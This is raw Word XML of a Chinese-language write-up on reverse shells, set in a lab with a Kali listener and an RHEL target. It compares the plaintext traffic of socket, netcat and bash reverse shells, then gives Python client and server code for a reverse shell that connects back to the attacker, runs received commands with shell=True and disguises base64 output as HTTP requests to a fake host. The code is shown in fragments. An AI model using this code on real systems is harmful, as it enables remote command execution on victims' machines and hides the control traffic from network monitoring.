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反弹shell的流量分析与加密</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="48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Kali-Linux：ip：192.168.0.101。侦听1234端口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RHEL：ip：192.168.0.117。反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="48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对各种反弹shell方式的流量分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.自行编程由socket套接字反弹shell（后面会附上我分别用python和java反弹shell的源码）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="165735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建立连接只有三次握手，无需任何多于内容。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接下来执行一些命令：pwd 、 ls 、 id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="2266315"/>
            <wp:effectExtent l="0" t="0" r="146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可见整个过程都在同一个tcp连接中</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260975" cy="1511935"/>
            <wp:effectExtent l="0" t="0" r="1206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2.nc反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4030980" cy="1676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测试结果同上面的一样。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3.bash反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4434840" cy="205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71411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7F0000"/>
          <w:shd w:val="clear" w:fill="FBEDED"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>每次目标会额外返回一个 用户相关信息：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7F0000"/>
          <w:shd w:val="clear" w:fill="FBEDED"/>
        </w:rPr>
        <w:t xml:space="preserve">[root@localhost ~]#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流量上有些许不同，不过本质上都一样。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="188023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从上面的测试可以看出，流量内容是以明文传输的。那么接下来我们以加密方式实现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="48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使用加密流量反弹shell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我们以python为例，本例伪装成HTTP</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>协议的方式，加密方式大家可以自由发挥：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客户端（目标）：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-*- coding: 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base64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argparse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subprocess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connection(host, port):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 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)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s.connect((host,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(port)))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= s.recv(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4096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data = decryption_req(data).decode()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comRst = subprocess.Popen(data,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shell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stdout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=subprocess.PIPE,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stderr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=subprocess.PIPE,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stdin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=subprocess.PIPE)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m_stdout, m_stderr = comRst.communicate()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rst = m_stdout.decode(sys.getfilesystemencoding()).encode()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s.send(encryption_req(rst))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s.send(encryption_req(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(e).encode()))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time.sleep(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s.close()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加密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encryption_req(data):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可以采用任何加密或编码方式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 = base64.b64encode(data).decode()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sendData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"POST /pushdata"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"HTTP/1.1"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"Host: tazxuo.com"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"Connection: close"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"Upgrade-Insecure-Requests: 1"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"User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/32.13 (KHTML, like Gecko) Chrome/59.0.332.13 Safari/452.36"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"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"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"Accept-Language: en-US,en;q=0.9"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"Accept-Encoding: gzip, deflate"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"stri0date=%s"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 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sendData.encode()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解密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decryption_req(data):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data.decode()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data[data.find(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"Connection: keep-alive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(base64.b64decode(data),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data.encode()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解码/解密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result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(base64.b64decode(result),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命令行参数解析对象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parser = argparse.ArgumentParser()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parser.add_argument(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'-host'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'hostName'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help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'Host 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parser.add_argument(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'-port'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'conPort'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help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'Host Port'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解析命令行参数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args = parser.parse_args()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host = args.hostName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port = args.conPort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host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None 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port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(parser.parse_args([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'-h'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exit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connection(host, port)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服务端（kali）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80" w:afterAutospacing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-*- coding: utf-8 -*-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base64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socket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argparse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connection(s):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'Waiting for connection......'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ss, addr = s.accept()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'client %s is connection!'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 (addr[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'print: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!q for Disconnect'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cmd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(addr[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]) +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':~#'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cmd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!q'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'-- Disconnected --'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exit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ss.send(encryption_res(cmd.encode()))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 = ss.recv(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4096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(decryption_req(data).decode())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encryption_res(data):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可以采用任何加密或编码方式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 = base64.b64encode(data).decode()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对时间进行处理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date = time.strftime(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'%a, %d %b %Y %X GMT'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time.localtime(time.time()))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sendData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"HTTP/1.1 200 OK"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"Date: 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 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"Content-Type: application/x-javascript"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"Content-Length: %d"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%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(data)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"Connection: keep-alive"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sendData +=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"%s"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 data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sendData.encode()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decryption_req(data):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data.decode()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data[data.find(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stri0date="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+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data[:data.find(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\r\n\r\n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data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(base64.b64decode(data),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data.encode()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命令行参数解析对象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parser = argparse.ArgumentParser()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parser.add_argument(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'-host'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'hostName'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'0.0.0.0'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help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'Host Name(default=0.0.0.0)'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parser.add_argument(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'-port'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'conPort'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1234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FFFFF"/>
        </w:rPr>
        <w:t>help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'Host Port(default=1234)'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解析命令行参数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args = parser.parse_args()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host = args.hostName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port = args.conPort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host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None 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port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(parser.parse_args([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'-h'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exit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 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)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s.bind((host,port))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s.listen(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connection(s)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4D48"/>
    <w:rsid w:val="024301C0"/>
    <w:rsid w:val="03E3146A"/>
    <w:rsid w:val="03FB0E70"/>
    <w:rsid w:val="04EC2AC7"/>
    <w:rsid w:val="06206E2B"/>
    <w:rsid w:val="06B81A0B"/>
    <w:rsid w:val="072378E1"/>
    <w:rsid w:val="07590F16"/>
    <w:rsid w:val="0ACE61DD"/>
    <w:rsid w:val="0BC47CF7"/>
    <w:rsid w:val="0C061356"/>
    <w:rsid w:val="0C6D4E87"/>
    <w:rsid w:val="0CF166E0"/>
    <w:rsid w:val="0DB13876"/>
    <w:rsid w:val="0DE220BA"/>
    <w:rsid w:val="1263573A"/>
    <w:rsid w:val="12697718"/>
    <w:rsid w:val="137C6EA3"/>
    <w:rsid w:val="167B58C7"/>
    <w:rsid w:val="173C0917"/>
    <w:rsid w:val="1F1B3406"/>
    <w:rsid w:val="1F6377C6"/>
    <w:rsid w:val="20552379"/>
    <w:rsid w:val="20595685"/>
    <w:rsid w:val="206A3794"/>
    <w:rsid w:val="20F54A30"/>
    <w:rsid w:val="21B52D3B"/>
    <w:rsid w:val="22677313"/>
    <w:rsid w:val="22EA1774"/>
    <w:rsid w:val="23130A5A"/>
    <w:rsid w:val="23CE0C79"/>
    <w:rsid w:val="243A0938"/>
    <w:rsid w:val="24400368"/>
    <w:rsid w:val="25B84FA2"/>
    <w:rsid w:val="26002C0E"/>
    <w:rsid w:val="271E0429"/>
    <w:rsid w:val="27215F2A"/>
    <w:rsid w:val="29D14A6C"/>
    <w:rsid w:val="2B351455"/>
    <w:rsid w:val="2B481683"/>
    <w:rsid w:val="2BBF5235"/>
    <w:rsid w:val="2C02177B"/>
    <w:rsid w:val="2E4240EE"/>
    <w:rsid w:val="312E6DF0"/>
    <w:rsid w:val="3178364D"/>
    <w:rsid w:val="32220286"/>
    <w:rsid w:val="326920F5"/>
    <w:rsid w:val="35BF3230"/>
    <w:rsid w:val="36C212AB"/>
    <w:rsid w:val="37B40796"/>
    <w:rsid w:val="3A127C3B"/>
    <w:rsid w:val="3B3A1222"/>
    <w:rsid w:val="3B874844"/>
    <w:rsid w:val="3C1736D1"/>
    <w:rsid w:val="3F90509A"/>
    <w:rsid w:val="3FCF5E15"/>
    <w:rsid w:val="3FF005CF"/>
    <w:rsid w:val="40E9372C"/>
    <w:rsid w:val="413B04A4"/>
    <w:rsid w:val="4183493A"/>
    <w:rsid w:val="41E5098E"/>
    <w:rsid w:val="42036AB0"/>
    <w:rsid w:val="421E4AAD"/>
    <w:rsid w:val="42B773DA"/>
    <w:rsid w:val="431E4869"/>
    <w:rsid w:val="47B62F3B"/>
    <w:rsid w:val="47CE0252"/>
    <w:rsid w:val="47EE2BE9"/>
    <w:rsid w:val="48595C8A"/>
    <w:rsid w:val="48D71E28"/>
    <w:rsid w:val="48E31F4B"/>
    <w:rsid w:val="48FB124F"/>
    <w:rsid w:val="49582271"/>
    <w:rsid w:val="49896243"/>
    <w:rsid w:val="4A0C377F"/>
    <w:rsid w:val="4B3E15F4"/>
    <w:rsid w:val="4BCE4A07"/>
    <w:rsid w:val="4F335A70"/>
    <w:rsid w:val="5027071C"/>
    <w:rsid w:val="55D0066B"/>
    <w:rsid w:val="55D42112"/>
    <w:rsid w:val="561A5CD8"/>
    <w:rsid w:val="57296DA7"/>
    <w:rsid w:val="57B62867"/>
    <w:rsid w:val="57CC227A"/>
    <w:rsid w:val="5875084C"/>
    <w:rsid w:val="58AA06B5"/>
    <w:rsid w:val="58AD3718"/>
    <w:rsid w:val="58D15E03"/>
    <w:rsid w:val="591C49DD"/>
    <w:rsid w:val="59DC2A85"/>
    <w:rsid w:val="5A19039D"/>
    <w:rsid w:val="5C5D6603"/>
    <w:rsid w:val="5DD50D45"/>
    <w:rsid w:val="5FAE14F8"/>
    <w:rsid w:val="5FC13B04"/>
    <w:rsid w:val="617D5FD2"/>
    <w:rsid w:val="6274035D"/>
    <w:rsid w:val="64373B1E"/>
    <w:rsid w:val="64E07FBC"/>
    <w:rsid w:val="656A5E1C"/>
    <w:rsid w:val="661A6481"/>
    <w:rsid w:val="69495E24"/>
    <w:rsid w:val="69B8022E"/>
    <w:rsid w:val="6AF56EB9"/>
    <w:rsid w:val="6B75185C"/>
    <w:rsid w:val="6D537DF5"/>
    <w:rsid w:val="6DBF6884"/>
    <w:rsid w:val="6DFF6F9E"/>
    <w:rsid w:val="6E643084"/>
    <w:rsid w:val="70F42C91"/>
    <w:rsid w:val="723436FD"/>
    <w:rsid w:val="726023F0"/>
    <w:rsid w:val="72DA546A"/>
    <w:rsid w:val="74A62FA6"/>
    <w:rsid w:val="7539165B"/>
    <w:rsid w:val="758C4FD0"/>
    <w:rsid w:val="76D36033"/>
    <w:rsid w:val="773818D3"/>
    <w:rsid w:val="7770280C"/>
    <w:rsid w:val="77BD7748"/>
    <w:rsid w:val="78161F51"/>
    <w:rsid w:val="788308FC"/>
    <w:rsid w:val="794F7BF8"/>
    <w:rsid w:val="79F21AE5"/>
    <w:rsid w:val="7B420CA2"/>
    <w:rsid w:val="7BB83888"/>
    <w:rsid w:val="7DEB7B59"/>
    <w:rsid w:val="7E2B5257"/>
    <w:rsid w:val="7F0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2019-09-15T00:49:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-09-15T10:10:50Z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